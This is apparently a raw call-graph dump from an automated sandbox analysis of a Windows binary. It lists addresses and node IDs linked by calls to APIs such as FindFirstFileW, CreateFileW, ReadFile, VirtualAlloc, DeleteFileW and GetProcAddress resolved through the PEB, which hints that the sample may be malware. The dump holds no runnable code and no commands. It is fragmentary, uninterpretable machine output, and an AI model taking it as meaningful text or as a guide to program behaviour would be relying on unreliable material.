4031e5 4 API calls 9171->9172 9173 4084c7 9172->9173 9173->9100 9175 4031e5 4 API calls 9174->9175 9176 4084e7 9175->9176 9176->9105 9178 4031e5 4 API calls 9177->9178 9179 408501 9178->9179 9179->9168 9181 4031e5 4 API calls 9180->9181 9182 408a06 9181->9182 9183 408b21 9182->9183 9184 4031e5 4 API calls 9182->9184 9183->9118 9187 408a32 9184->9187 9185 408b17 9215 403649 9185->9215 9187->9185 9206 403666 9187->9206 9190 408b0e 9212 40362f 9190->9212 9191 4031e5 4 API calls 9193 408a88 9191->9193 9193->9190 9194 4031e5 4 API calls 9193->9194 9195 408ac4 9194->9195 9196 405b6f 6 API calls 9195->9196 9197 408aff 9196->9197 9197->9190 9209 408508 9197->9209 9200 408744 9199->9200 9201 4086e2 9199->9201 9200->9118 9201->9200 9202 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9201->9202 9202->9201 9204 4031e5 4 API calls 9203->9204 9205 4036b5 9204->9205 9205->9118 9207 4031e5 4 API calls 9206->9207 9208 403679 9207->9208 9208->9190 9208->9191 9210 4031e5 4 API calls 9209->9210 9211 40851b 9210->9211 9211->9190 9213 4031e5 4 API calls 9212->9213 9214 403642 9213->9214 9214->9185 9216 4031e5 4 API calls 9215->9216 9217 40365c 9216->9217 9217->9183 9813 40f252 9814 404bee 6 API calls 9813->9814 9815 40f269 9814->9815 9816 404bee 6 API calls 9815->9816 9827 40f2ff 9815->9827 9817 40f282 9816->9817 9818 404bee 6 API calls 9817->9818 9819 40f290 9818->9819 9830 404c4e 9819->9830 9821 40f2a7 9822 405872 4 API calls 9821->9822 9821->9827 9823 40f2cd 9822->9823 9824 405872 4 API calls 9823->9824 9825 40f2dc 9824->9825 9826 405872 4 API calls 9825->9826 9828 40f2ee 9826->9828 9829 405762 4 API calls 9828->9829 9829->9827 9831 402b7c 2 API calls 9830->9831 9833 404c60 9831->9833 9832 404ca4 9832->9821 9833->9832 9834 4031e5 4 API calls 9833->9834 9835 404c8d 9834->9835 9835->9832 9836 402bab 2 API calls 9835->9836 9836->9832 9837 41045c 9838 4040bb 12 API calls 9837->9838 9839 410477 9838->9839 9840 41060b 9839->9840 9868 407851 9839->9868 9842 41048f 9844 407851 2 API calls 9842->9844 9848 410604 9842->9848 9843 403f9e 5 API calls 9843->9840 9845 4104a9 9844->9845 9850 4105e0 9845->9850 9851 405ae9 6 API calls 9845->9851 9853 41056f 9845->9853 9854 4105eb 9845->9854 9846 402bab 2 API calls 9846->9848 9847 402bab 2 API calls 9849 4105fb 9847->9849 9848->9843 9849->9846 9852 402bab 2 API calls 9850->9852 9850->9854 9851->9845 9852->9854 9853->9850 9855 4105d6 9853->9855 9857 412269 6 API calls 9853->9857 9854->9847 9854->9849 9856 402bab 2 API calls 9855->9856 9856->9850 9858 410580 9857->9858 9858->9855 9859 405872 4 API calls 9858->9859 9860 410599 9859->9860 9861 405872 4 API calls 9860->9861 9862 4105a9 9861->9862 9863 405872 4 API calls 9862->9863 9864 4105bb 9863->9864 9865 405872 4 API calls 9864->9865 9866 4105cd 9865->9866 9867 402bab 2 API calls 9866->9867 9867->9855 9869 407866 9868->9869 9870 402b7c 2 API calls 9869->9870 9871 407899 9869->9871 9870->9871 9871->9842 9279 40f561 9282 40f4b6 9279->9282 9283 413b28 6 API calls 9282->9283 9284 40f4bf 9283->9284 9285 405b6f 6 API calls 9284->9285 9286 402bab GetProcessHeap RtlFreeHeap 9284->9286 9287 413a58 13 API calls 9284->9287 9288 40f559 9284->9288 9285->9284 9286->9284 9287->9284 9292 403b64 9293 4031e5 4 API calls 9292->9293 9294 403b77 PathFileExistsW 9293->9294 9903 40d069 9904 404bee 6 API calls 9903->9904 9905 40d080 9904->9905 9906 404bee 6 API calls 9905->9906 9928 40d1e2 9905->9928 9907 40d099 9906->9907 9908 404bee 6 API calls 9907->9908 9909 40d0a7 9908->9909 9944 404ba7 9909->9944 9912 404bee 6 API calls 9913 40d0c5 9912->9913 9914 404c4e 6 API calls 9913->9914 9915 40d0dc 9914->9915 9916 404bee 6 API calls 9915->9916 9917 40d0eb 9916->9917 9918 404ba7 4 API calls 9917->9918 9919 40d0fa 9918->9919 9920 404bee 6 API calls 9919->9920 9921 40d109 9920->9921 9922 404c4e 6 API calls 9921->9922 9923 40d123 9922->9923 9924 405872 4 API calls 9923->9924 9923->9928 9925 40d14a 9924->9925 9926 405872 4 API calls 9925->9926 9927 40d159 9926->9927 9929 405872 4 API calls 9927->9929 9930 40d16b 9929->9930 9931 405781 4 API calls 9930->9931 9932 40d179 9931->9932 9933 405872 4 API calls 9932->9933 9934 40d18b 9933->9934 9935 405762 4 API calls 9934->9935 9936 40d19f 9935->9936 9937 405872 4 API calls 9936->9937 9938 40d1b1 9937->9938 9939 405781 4 API calls 9938->9939 9940 40d1bf 9939->9940 9941 405872 4 API calls 9940->9941 9942 40d1d1 9941->9942 9943 405762 4 API calls 9942->9943 9943->9928 9945 4031e5 4 API calls 9944->9945 9946 404bca 9945->9946 9946->9912 9321 40f16e 9322 4056bf 2 API calls 9321->9322 9323 40f17b 9322->9323 9324 412093 20 API calls 9323->9324 9325 40f19e 9324->9325 9326 412093 20 API calls 9325->9326 9327 40f1b6 9326->9327 9328 412093 20 API calls 9327->9328 9329 40f1cc 9328->9329 9330 412093 20 API calls 9329->9330 9331 40f1e2 9330->9331 9332 413aca 4 API calls 9331->9332 9333 40f1ef 9332->9333 9334 405695 2 API calls 9333->9334 9335 40f1fa 9334->9335 9336 40ce71 9337 413b28 6 API calls 9336->9337 9338 40ce78 9337->9338 9339 405b6f 6 API calls 9338->9339 9340 40ce83 9339->9340 9344 40ceba 9340->9344 9347 403d74 19 API calls 9340->9347 9348 40cec1 9340->9348 9341 403fbf 7 API calls 9342 40cecc 9341->9342 9343 40cefb 9342->9343 9346 403d74 19 API calls 9342->9346 9345 402bab 2 API calls 9344->9345 9345->9348 9349 40cee7 9346->9349 9350 40cead 9347->9350 9348->9341 9351 40cef4 9349->9351 9354 402bab 2 API calls 9349->9354 9350->9344 9353 402bab 2 API calls 9350->9353 9352 402bab 2 API calls 9351->9352 9352->9343 9353->9344 9354->9351 9355 406472 9356 4031e5 4 API calls 9355->9356 9357 406484 Sleep 9356->9357 10020 40f204 10021 405781 4 API calls 10020->10021 10022 40f214 10021->10022 10023 4057df 13 API calls 10022->10023 10024 40f226 10023->10024 9415 403c08 9416 4031e5 4 API calls 9415->9416 9417 403c1a DeleteFileW 9416->9417 9418 410a09 9419 41219c 14 API calls 9418->9419 9420 410a1b 9419->9420 9421 41219c 14 API calls 9420->9421 9422 410a23 9421->9422 9423 41219c 14 API calls 9422->9423 9424 410a2c 9423->9424 9425 41219c 14 API calls 9424->9425 9426 410a38 9425->9426 9427 404b22 6 API calls 9426->9427 9428 410a4c 9427->9428 9429 403fbf 7 API calls 9428->9429 9435 410a7a 9428->9435 9430 410a5c 9429->9430 9431 410a71 9430->9431 9432 413a58 13 API calls 9430->9432 9433 402bab 2 API calls 9431->9433 9434 410a6b 9432->9434 9433->9435 9436 402bab 2 API calls 9434->9436 9436->9431 10025 410d09 10026 410d56 10025->10026 10027 410d17 10025->10027 10029 413a58 13 API calls 10026->10029 10041 406642 10027->10041 10031 410d6f 10029->10031 10032 4056bf 2 API calls 10033 410d2e 10032->10033 10054 405641 10033->10054 10035 410d41 10036 413aca 4 API calls 10035->10036 10037 410d4a 10036->10037 10038 405695 2 API calls 10037->10038 10039 410d50 10038->10039 10040 4036a3 4 API calls 10039->10040 10040->10026 10042 406662 10041->10042 10043 4031e5 4 API calls 10042->10043 10044 406676 10043->10044 10058 4066bf 10044->10058 10049 4066b1 10052 4036a3 4 API calls 10049->10052 10050 4066a7 10051 4036a3 4 API calls 10050->10051 10053 4066ac 10051->10053 10052->10053 10053->10026 10053->10032 10055 40564d 10054->10055 10056 405673 10054->10056 10055->10056 10057 4056fc 4 API calls 10055->10057 10056->10035 10057->10056 10059 4031e5 4 API calls 10058->10059 10060 4066dc 10059->10060 10061 4066f6 SetLastError 10060->10061 10062 406708 GetLastError 10060->10062 10063 406693 10061->10063 10062->10063 10064 406713 10062->10064 10080 406455 10063->10080 10065 4031e5 4 API calls 10064->10065 10066 406725 10065->10066 10066->10063 10067 4031e5 4 API calls 10066->10067 10068 40673f 10067->10068 10069 406753 10068->10069 10070 406749 10068->10070 10072 4031e5 4 API calls 10069->10072 10071 4036a3 4 API calls 10070->10071 10071->10063 10073 406761 10072->10073 10074 40678a 10073->10074 10075 40677c 10073->10075 10077 4036a3 4 API calls 10074->10077 10076 4036a3 4 API calls 10075->10076 10078 406781 10076->10078 10077->10063 10079 4036a3 4 API calls 10078->10079 10079->10063 10081 4031e5 4 API calls 10080->10081 10082 406468 10081->10082 10082->10049 10082->10050 9437 40c509 9438 412093 20 API calls 9437->9438 9439 40c51e 9438->9439 9446 40910d 9447 404b22 6 API calls 9446->9447 9448 409124 9447->9448 9449 40917a 9448->9449 9450 405b6f 6 API calls 9448->9450 9451 40913e 9450->9451 9453 404b22 6 API calls 9451->9453 9457 409173 9451->9457 9452 402bab 2 API calls 9452->9449 9454 409153 9453->9454 9456 409408 15 API calls 9454->9456 9460 40916a 9454->9460 9455 402bab 2 API calls 9455->9457 9458 409164 9456->9458 9457->9452 9459 402bab 2 API calls 9458->9459 9459->9460 9460->9455 9464 410410 9465 4056bf 2 API calls 9464->9465 9466 41041b 9465->9466 9467 412093 20 API calls 9466->9467 9468 41043c 9467->9468 9469 413aca 4 API calls 9468->9469 9470 410449 9469->9470 9471 405695 2 API calls 9470->9471 9472 410454 9471->9472 9499 40c71a 9500 41219c 14 API calls 9499->9500 9501 40c728 9500->9501 10138 410b1a 10139 404bee 6 API calls 10138->10139 10141 410b31 10139->10141 10140 410c6d 10141->10140 10142 404bee 6 API calls 10141->10142 10143 410b5a 10142->10143 10144 404bee 6 API calls 10143->10144 10145 410b69 10144->10145 10146 404bee 6 API calls 10145->10146 10147 410b78 10146->10147 10148 404ba7 4 API calls 10147->10148 10149 410b86 10148->10149 10150 404ba7 4 API calls 10149->10150 10151 410b95 10150->10151 10151->10140 10152 405872 4 API calls 10151->10152 10153 410bd7 10152->10153 10154 405872 4 API calls 10153->10154 10155 410be8 10154->10155 10156 405872 4 API calls 10155->10156 10157 410bf9 10156->10157 10158 405781 4 API calls 10157->10158 10159 410c07 10158->10159 10160 405781 4 API calls 10159->10160 10162 410c15 10160->10162 10161 405762 4 API calls 10163 410c60 10161->10163 10170 410c4e 10162->10170 10171 405e5a 10162->10171 10163->10140 10164 403f9e 5 API calls 10163->10164 10164->10140 10167 4040bb 12 API calls 10168 410c44 10167->10168 10169 402bab 2 API calls 10168->10169 10169->10170 10170->10161 10172 402b7c 2 API calls 10171->10172 10173 405e72 10172->10173 10174 4031e5 4 API calls 10173->10174 10177 405ea3 10173->10177 10175 405e94 10174->10175 10176 402bab 2 API calls 10175->10176 10175->10177 10176->10177 10177->10167 10177->10170 10178 40f81c 10179 404bee 6 API calls 10178->10179 10180 40f833 10179->10180 10181 404bee 6 API calls 10180->10181 10195 40f94f 10180->10195 10182 40f85c 10181->10182 10183 404bee 6 API calls 10182->10183 10184 40f86b 10183->10184 10185 404bee 6 API calls 10184->10185 10186 40f87a 10185->10186 10187 404bee 6 API calls 10186->10187 10188 40f888 10187->10188 10189 404ba7 4 API calls 10188->10189 10190 40f897 10189->10190 10191 405872 4 API calls 10190->10191 10190->10195 10192 40f8d8 10191->10192 10193 405872 4 API calls 10192->10193 10194 40f8ea 10193->10194 10196 405872 4 API calls 10194->10196 10197 40f8fa 10196->10197 10198 405872 4 API calls 10197->10198 10199 40f90c 10198->10199 10200 405781 4 API calls 10199->10200 10201 40f91d 10200->10201 10202 4040bb 12 API calls 10201->10202 10203 40f92d 10202->10203 10204 405762 4 API calls 10203->10204 10205 40f93f 10204->10205 10205->10195 10206 403f9e 5 API calls 10205->10206 10206->10195 9514 402c1f 9515 4031e5 4 API calls 9514->9515 9516 402c31 LoadLibraryW 9515->9516 10216 407e1f 10217 407e2c 10216->10217 10220 407e61 10216->10220 10221 407e3e 10217->10221 10223 402bab 2 API calls 10217->10223 10225 407e51 10217->10225 10218 407eb6 10218->10225 10226 402bab 2 API calls 10218->10226 10219 407ed4 10220->10218 10227 405872 4 API calls 10220->10227 10233 407ea6 10220->10233 10221->10219 10224 402bab 2 API calls 10221->10224 10222 402bab 2 API calls 10222->10218 10223->10221 10224->10225 10225->10219 10228 402bab 2 API calls 10225->10228 10226->10225 10229 407e86 10227->10229 10228->10219 10230 405872 4 API calls 10229->10230 10231 407e96 10230->10231 10232 405872 4 API calls 10231->10232 10232->10233 10233->10218 10233->10222 9529 405924 9530 4031e5 4 API calls 9529->9530 9531 405937 StrStrW 9530->9531 10242 410927 10243 4044ee 7 API calls 10242->10243 10244 41093d 10243->10244 10245 4056bf 2 API calls 10244->10245 10256 4109a4 10244->10256 10246 410954 10245->10246 10247 4044ee 7 API calls 10246->10247 10249 410990 10246->10249 10250 402bab 2 API calls 10246->10250 10257 41080e 10246->10257 10247->10246 10251 413aca 4 API calls 10249->10251 10250->10246 10252 410998 10251->10252 10253 405695 2 API calls 10252->10253 10254 41099e 10253->10254 10255 402bab 2 API calls 10254->10255 10255->10256 10258 410821 10257->10258 10268 41091f 10258->10268 10269 410701 10258->10269 10261 405872 4 API calls 10262 410900 10261->10262 10263 405872 4 API calls 10262->10263 10264 41090d 10263->10264 10265 405872 4 API calls 10264->10265 10266 410919 10265->10266 10267 402bab 2 API calls 10266->10267 10267->10268 10268->10246 10270 405f08 4 API calls 10269->10270 10272 410713 10270->10272 10271 410804 10271->10261 10271->10268 10272->10271 10273 402b7c 2 API calls 10272->10273 10277 410748 10273->10277 10274 4107fd 10275 402bab 2 API calls 10274->10275 10275->10271 10276 402b7c 2 API calls 10279 4107ad 10276->10279 10277->10274 10277->10276 10278 402bab 2 API calls 10278->10274 10279->10278 10280 40d726 10281 404bee 6 API calls 10280->10281 10282 40d73f 10281->10282 10283 405872 4 API calls 10282->10283 10295 40db63 10282->10295 10286 40d761 10283->10286 10284 404bee 6 API calls 10284->10286 10285 405872 4 API calls 10285->10286 10286->10284 10286->10285 10288 40d971 10286->10288 10287 404ba7 4 API calls 10287->10288 10288->10287 10289 405781 4 API calls 10288->10289 10294 40d9bb 10288->10294 10289->10288 10290 404c4e 6 API calls 10290->10294 10291 405781 4 API calls 10291->10294 10292 4037be 4 API calls 10292->10294 10293 405872 4 API calls 10293->10294 10294->10290 10294->10291 10294->10292 10294->10293 10294->10295 9587 40f12f 9588 41219c 14 API calls 9587->9588 9589 40f13f 9588->9589 9590 41219c 14 API calls 9589->9590 9591 40f14c 9590->9591 9592 41219c 14 API calls 9591->9592 9593 40f159 9592->9593 9594 41219c 14 API calls 9593->9594 9595 40f166 9594->9595 9602 40ed35 9603 4056bf 2 API calls 9602->9603 9604 40ed42 9603->9604 9605 412093 20 API calls 9604->9605 9606 40ed63 9605->9606 9607 412093 20 API calls 9606->9607 9608 40ed73 9607->9608 9609 413aca 4 API calls 9608->9609 9610 40ed80 9609->9610 9611 405695 2 API calls 9610->9611 9612 40ed8e 9611->9612 8056 40f3c5 8061 41219c 8056->8061 8059 41219c 14 API calls 8060 40f3e1 8059->8060 8062 4121b1 8061->8062 8078 40f3d3 8061->8078 8063 4121be 8062->8063 8067 4121c5 8062->8067 8109 413ba4 8063->8109 8065 4121ca 8079 404056 8065->8079 8067->8065 8072 412210 8067->8072 8068 4121c3 8068->8078 8086 405b6f 8068->8086 8071 41224d 8076 402bab 2 API calls 8071->8076 8071->8078 8072->8078 8114 403fbf 8072->8114 8076->8078 8078->8059 8125 402b7c GetProcessHeap RtlAllocateHeap 8079->8125 8081 404066 8083 404095 8081->8083 8127 4031e5 8081->8127 8083->8068 8085 402bab 2 API calls 8085->8083 8087 405b7d 8086->8087 8088 402b7c 2 API calls 8087->8088 8089 405b99 8088->8089 8095 405c02 8089->8095 8163 4059b8 8089->8163 8091 405c09 8093 402bab 2 API calls 8091->8093 8092 405bba 8092->8091 8094 402b7c 2 API calls 8092->8094 8093->8095 8096 405bdd 8094->8096 8095->8071 8099 413a58 8095->8099 8096->8091 8097 405be4 8096->8097 8098 402bab 2 API calls 8097->8098 8098->8095 8100 412245 8099->8100 8101 413a63 8099->8101 8122 402bab 8100->8122 8101->8100 8166 405781 8101->8166 8104 405781 4 API calls 8105 413aa0 8104->8105 8169 4057df 8105->8169 8108 405781 4 API calls 8108->8100 8110 413bad 8109->8110 8111 404056 6 API calls 8110->8111 8113 413bb8 8110->8113 8112 413bc5 8111->8112 8112->8068 8113->8068 8115 402b7c 2 API calls 8114->8115 8116 403fcf 8115->8116 8117 403ff4 8116->8117 8288 403b98 8116->8288 8117->8068 8120 403ff8 GetLastError 8121 402bab 2 API calls 8120->8121 8121->8117 8123 402bb4 GetProcessHeap RtlFreeHeap 8122->8123 8124 402bc6 8122->8124 8123->8124 8124->8071 8126 402b98 8125->8126 8126->8081 8128 4031f3 8127->8128 8129 403236 8127->8129 8128->8129 8131 403208 8128->8131 8138 4030a5 8129->8138 8144 403263 8131->8144 8132 403258 8132->8083 8132->8085 8134 40320d 8134->8132 8136 4030a5 4 API calls 8134->8136 8135 4031e5 4 API calls 8135->8132 8137 403224 8136->8137 8137->8132 8137->8135 8150 402ca4 8138->8150 8140 4030b0 8141 4030b5 8140->8141 8154 4030c4 8140->8154 8141->8137 8145 40326d 8144->8145 8146 402b7c 2 API calls 8145->8146 8149 4032b7 8145->8149 8147 40328c 8146->8147 8148 402b7c 2 API calls 8147->8148 8148->8149 8149->8134 8151 403079 8150->8151 8152 40307c 8151->8152 8158 40317b GetPEB 8151->8158 8152->8140 8156 4030eb 8154->8156 8155 4030c0 8155->8137 8156->8155 8160 402c03 8156->8160 8159 40319b 8158->8159 8159->8152 8161 4031e5 3 API calls 8160->8161 8162 402c15 GetProcAddress 8161->8162 8162->8155 8164 4031e5 4 API calls 8163->8164 8165 4059cb 8164->8165 8165->8092 8184 405797 8166->8184 8168 405792 8168->8104 8170 4057eb 8169->8170 8183 405832 8169->8183 8170->8183 8194 4040bb 8170->8194 8173 40582c 8218 403f9e 8173->8218 8174 405853 8232 405762 8174->8232 8175 405839 8175->8174 8221 405627 8175->8221 8181 403f9e 5 API calls 8181->8183 8183->8100 8183->8108 8185 4057a1 8184->8185 8186 4057bd 8184->8186 8185->8186 8188 4056fc 8185->8188 8186->8168 8189 405714 8188->8189 8190 402b7c 2 API calls 8189->8190 8191 405730 8190->8191 8192 402bab 2 API calls 8191->8192 8193 405752 8191->8193 8192->8193 8193->8186 8195 4031e5 4 API calls 8194->8195 8196 4040d5 CreateFileW 8195->8196 8197 4040f8 8196->8197 8198 40418d 8196->8198 8199 4031e5 4 API calls 8197->8199 8200 404183 8198->8200 8238 403c90 8198->8238 8206 404105 8199->8206 8200->8173 8200->8175 8200->8183 8203 40416d 8235 403c40 8203->8235 8206->8203 8210 4031e5 4 API calls 8206->8210 8208 4040bb 9 API calls 8211 4041c8 8208->8211 8209 402bab 2 API calls 8209->8200 8212 404131 VirtualAlloc 8210->8212 8211->8209 8212->8203 8213 404142 8212->8213 8214 4031e5 4 API calls 8213->8214 8215 40414f ReadFile 8214->8215 8215->8203 8216 404160 8215->8216 8217 4031e5 4 API calls 8216->8217 8217->8203 8219 4031e5 4 API calls 8218->8219 8220 403fb1 VirtualFree 8219->8220 8220->8183 8222 4031e5 4 API calls 8221->8222 8223 40563a 8222->8223 8224 405872 8223->8224 8226 405881 8224->8226 8225 4058bc 8228 405797 4 API calls 8225->8228 8229 4058af 8225->8229 8226->8225 8285 4058d4 8226->8285 8228->8229 8229->8174 8231 405781 4 API calls 8231->8225 8233 405781 4 API calls 8232->8233 8234 405770 8233->8234 8234->8181 8236 4031e5 4 API calls 8235->8236 8237 403c52 FindCloseChangeNotification 8236->8237 8237->8200 8239 403ca3 8238->8239 8242 403caa 8238->8242 8265 405dc5 8239->8265 8241 404056 6 API calls 8243 403cbe 8241->8243 8242->8241 8244 403d3a 8242->8244 8245 403d2e 8243->8245 8246 403d17 8243->8246 8247 403ccf 8243->8247 8244->8200 8261 403c59 8244->8261 8245->8244 8248 402bab 2 API calls 8245->8248 8249 405b6f 6 API calls 8246->8249 8250 405b6f 6 API calls 8247->8250 8248->8244 8252 403d14 8249->8252 8251 403cdd 8250->8251 8253 405b6f 6 API calls 8251->8253 8254 402bab 2 API calls 8252->8254 8255 403cee 8253->8255 8254->8245 8255->8252 8270 403d4d 8255->8270 8258 403d0b 8260 402bab 2 API calls 8258->8260 8260->8252 8262 403c21 8261->8262 8263 4031e5 4 API calls 8262->8263 8264 403c33 8263->8264 8264->8208 8264->8211 8279 406799 8265->8279 8267 405dd5 8268 402b7c 2 API calls 8267->8268 8269 405dfe 8268->8269 8269->8242 8282 403bb7 8270->8282 8272 403cfe 8272->8258 8273 403c62 8272->8273 8274 403d4d 5 API calls 8273->8274 8275 403c6d 8274->8275 8276 403c72 8275->8276 8277 4031e5 4 API calls 8275->8277 8276->8258 8278 403c87 CreateDirectoryW 8277->8278 8278->8258 8280 4031e5 4 API calls 8279->8280 8281 4067ad 8280->8281 8281->8267 8283 4031e5 4 API calls 8282->8283 8284 403bc9 GetFileAttributesW 8283->8284 8284->8272 8286 405797 4 API calls 8285->8286 8287 4058a8 8286->8287 8287->8229 8287->8231 8289 4031e5 4 API calls 8288->8289 8290 403baa 8289->8290 8290->8117 8290->8120 9722 40ebc6 9723 4040bb 12 API calls 9722->9723 9724 40ebdf 9723->9724 9725 40ecd7 9724->9725 9742 407795 9724->9742 9728 4056bf 2 API calls 9740 40ec12 9728->9740 9729 403f9e 5 API calls 9729->9725 9730 40ecb5 9731 402bab 2 API calls 9730->9731 9732 40ecbd 9731->9732 9733 413aca 4 API calls 9732->9733 9734 40ecc7 9733->9734 9735 405695 2 API calls 9734->9735 9736 40eccd 9735->9736 9736->9729 9737 407908 GetProcessHeap RtlAllocateHeap 9737->9740 9739 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9739->9740 9740->9730 9740->9737 9740->9739 9741 402bab GetProcessHeap RtlFreeHeap 9740->9741 9753 412269 9740->9753 9741->9740 9743 4077ab 9742->9743 9749 4077b3 9743->9749 9760 405ae9 9743->9760 9745 4077e1 9746 407802 9745->9746 9747 4077f8 9745->9747 9745->9749 9750 402b7c 2 API calls 9746->9750 9748 402bab 2 API calls 9747->9748 9748->9749 9749->9728 9749->9736 9751 407811 9750->9751 9752 402bab 2 API calls 9751->9752 9752->9749 9776 40374e 9753->9776 9756 412299 9756->9740 9759 402bab 2 API calls 9759->9756 9761 405af7 9760->9761 9762 402b7c 2 API calls 9761->9762 9764 405b03 9762->9764 9763 405b5a 9763->9745 9764->9763 9773 405998 9764->9773 9766 405b21 9767 405b61 9766->9767 9768 402b7c 2 API calls 9766->9768 9769 402bab 2 API calls 9767->9769 9770 405b39 9768->9770 9769->9763 9770->9767 9771 405b40 9770->9771 9772 402bab 2 API calls 9771->9772 9772->9763 9774 4031e5 4 API calls 9773->9774 9775 4059ab 9774->9775 9775->9766 9777 402b7c 2 API calls 9776->9777 9779 40375f 9777->9779 9778 4037a3 9778->9756 9783 4037be 9778->9783 9779->9778 9780 4031e5 4 API calls 9779->9780 9781 40378f 9780->9781 9781->9778 9782 402bab 2 API calls 9781->9782 9782->9778 9784 4031e5 4 API calls 9783->9784 9785 4037e2 9784->9785 9786 402b7c 2 API calls 9785->9786 9792 40382b 9785->9792 9787 403802 9786->9787 9788 403832 9787->9788 9790 403809 9787->9790 9789 4036a3 4 API calls 9788->9789 9789->9792 9791 4036a3 4 API calls 9790->9791 9791->9792 9792->9759 8888 410cd1 8893 412093 8888->8893 8891 412093 20 API calls 8892 410cff 8891->8892 8895 4120a5 8893->8895 8914 410cf1 8893->8914 8894 4120b3 8896 404056 6 API calls 8894->8896 8895->8894 8899 412100 8895->8899 8897 4120ba 8896->8897 8898 405b6f 6 API calls 8897->8898 8900 412152 8897->8900 8897->8914 8901 412125 8898->8901 8903 403fbf 7 API calls 8899->8903 8899->8914 8915 403d74 8900->8915 8901->8900 8906 412139 8901->8906 8907 41214d 8901->8907 8903->8897 8905 41218c 8911 402bab 2 API calls 8905->8911 8905->8914 8910 402bab 2 API calls 8906->8910 8909 402bab 2 API calls 8907->8909 8908 402bab 2 API calls 8908->8905 8909->8900 8912 41213e 8910->8912 8911->8914 8913 402bab 2 API calls 8912->8913 8913->8914 8914->8891 8916 403d87 8915->8916 8917 403ea3 8916->8917 8918 405b6f 6 API calls 8916->8918 8919 405b6f 6 API calls 8917->8919 8920 403da3 8918->8920 8921 403eb9 8919->8921 8920->8917 8922 4031e5 4 API calls 8920->8922 8923 4031e5 4 API calls 8921->8923 8930 403f6f 8921->8930 8924 403dbc FindFirstFileW 8922->8924 8925 403ed3 FindFirstFileW 8923->8925 8937 403e9c 8924->8937 8946 403dd1 8924->8946 8929 403ee8 8925->8929 8944 403f8d 8925->8944 8926 402bab 2 API calls 8926->8930 8927 402bab 2 API calls 8927->8917 8928 4031e5 4 API calls 8931 403e84 FindNextFileW 8928->8931 8934 405b6f 6 API calls 8929->8934 8935 4031e5 4 API calls 8929->8935 8940 403f75 8929->8940 8948 402bab 2 API calls 8929->8948 8958 40fa23 8929->8958 8930->8905 8930->8908 8932 403e96 8931->8932 8931->8946 8955 403bef 8932->8955 8934->8929 8936 403f50 FindNextFileW 8935->8936 8936->8929 8939 403f87 8936->8939 8937->8927 8938 405b6f 6 API calls 8938->8946 8941 403bef 5 API calls 8939->8941 8942 402bab 2 API calls 8940->8942 8941->8944 8945 403f7b 8942->8945 8943 403d74 15 API calls 8943->8946 8944->8926 8947 403bef 5 API calls 8945->8947 8946->8928 8946->8938 8946->8943 8949 402bab 2 API calls 8946->8949 8950 403f63 8946->8950 8947->8930 8948->8929 8949->8946 8951 402bab 2 API calls 8950->8951 8952 403f69 8951->8952 8953 403bef 5 API calls 8952->8953 8953->8930 8956 4031e5 4 API calls 8955->8956 8957 403c01 FindClose 8956->8957 8957->8937 8959 40fa39 8958->8959 8960 410293 8959->8960 8961 405b6f 6 API calls 8959->8961 8960->8929 8962 40ffcc 8961->8962 8962->8960 8963 4040bb 12 API calls 8962->8963 8964 40ffeb 8963->8964 8965 41028c 8964->8965 8968 402b7c 2 API calls 8964->8968 9013 41027d 8964->9013 8966 402bab 2 API calls 8965->8966 8966->8960 8967 403f9e 5 API calls 8967->8965 8969 41001e 8968->8969 8970 40a423 4 API calls 8969->8970 8969->9013 8971 41004a 8970->8971 8972 4031e5 4 API calls 8971->8972 8973 41005c 8972->8973 8974 4031e5 4 API calls 8973->8974 8975 410079 8974->8975 8976 4031e5 4 API calls 8975->8976 8977 410096 8976->8977 8978 4031e5 4 API calls 8977->8978 8979 4100b0 8978->8979 8980 4031e5 4 API calls 8979->8980 8981 4100cd 8980->8981 8982 4031e5 4 API calls 8981->8982 8983 4100ea 8982->8983 9014 412516 8983->9014 8985 4100fd 8986 40642c 5 API calls 8985->8986 8987 41013e 8986->8987 8988 410142 8987->8988 8989 41019f 8987->8989 8990 40488c 5 API calls 8988->8990 8992 4031e5 4 API calls 8989->8992 8991 410151 8990->8991 8994 41019c 8991->8994 8995 404866 4 API calls 8991->8995 9006 4101bb 8992->9006 8993 41022a 9003 413a58 13 API calls 8993->9003 8994->8993 8996 40642c 5 API calls 8994->8996 8997 410163 8995->8997 8998 410201 8996->8998 9002 406c4c 6 API calls 8997->9002 9011 41018e 8997->9011 9000 410205 8998->9000 9001 41022f 8998->9001 8999 403c40 5 API calls 8999->8994 9004 4126a7 7 API calls 9000->9004 9017 4125db 9001->9017 9007 410178 9002->9007 9008 41026e 9003->9008 9004->8993 9009 4031e5 4 API calls 9006->9009 9010 406c4c 6 API calls 9007->9010 9012 402bab 2 API calls 9008->9012 9009->8994 9010->9011 9011->8999 9012->9013 9013->8967 9015 4031e5 4 API calls 9014->9015 9016 412539 9015->9016 9016->8985 9018 40488c 5 API calls 9017->9018 9019 4125ec 9018->9019 9020 41269f 9019->9020 9021 4031e5 4 API calls 9019->9021 9020->8993 9022 412609 9021->9022 9023 41268f 9022->9023 9024 4031e5 4 API calls 9022->9024 9025 403c40 5 API calls 9023->9025 9026 41262a 9024->9026 9025->9020 9027 412675 9026->9027 9034 4124f1 9026->9034 9029 4031e5 4 API calls 9027->9029 9029->9023 9031 412663 9033 4031e5 4 API calls 9031->9033 9032 4124f1 4 API calls 9032->9031 9033->9027 9035 4031e5 4 API calls 9034->9035 9036 412503 9035->9036 9036->9031 9036->9032 9223 4049dc 9224 4031e5 4 API calls 9223->9224 9225 4049ef 9224->9225 9875 40cddd 9876 405b6f 6 API calls 9875->9876 9877 40cdee 9876->9877 9878 40ce06 9877->9878 9880 413a58 13 API calls 9877->9880 9879 40ce59 9878->9879 9881 405b6f 6 API calls 9878->9881 9882 40ce00 9880->9882 9884 40ce1c 9881->9884 9883 402bab 2 API calls 9882->9883 9883->9878 9884->9879 9885 40ce52 9884->9885 9886 403d74 19 API calls 9884->9886 9887 402bab 2 API calls 9885->9887 9888 40ce45 9886->9888 9887->9879 9888->9885 9889 402bab 2 API calls 9888->9889 9889->9885 9226 40ecde 9227 412093 20 API calls 9226->9227 9228 40ecfd 9227->9228 9229 412093 20 API calls 9228->9229 9230 40ed0d 9229->9230 9234 40e8df 9235 412093 20 API calls 9234->9235 9236 40e8f8 9235->9236 9237 412093 20 API calls 9236->9237 9238 40e908 9237->9238 9245 404b22 9238->9245 9240 40e91c 9241 40e936 9240->9241 9244 40e93d 9240->9244 9252 40e944 9240->9252 9243 402bab 2 API calls 9241->9243 9243->9244 9246 402b7c 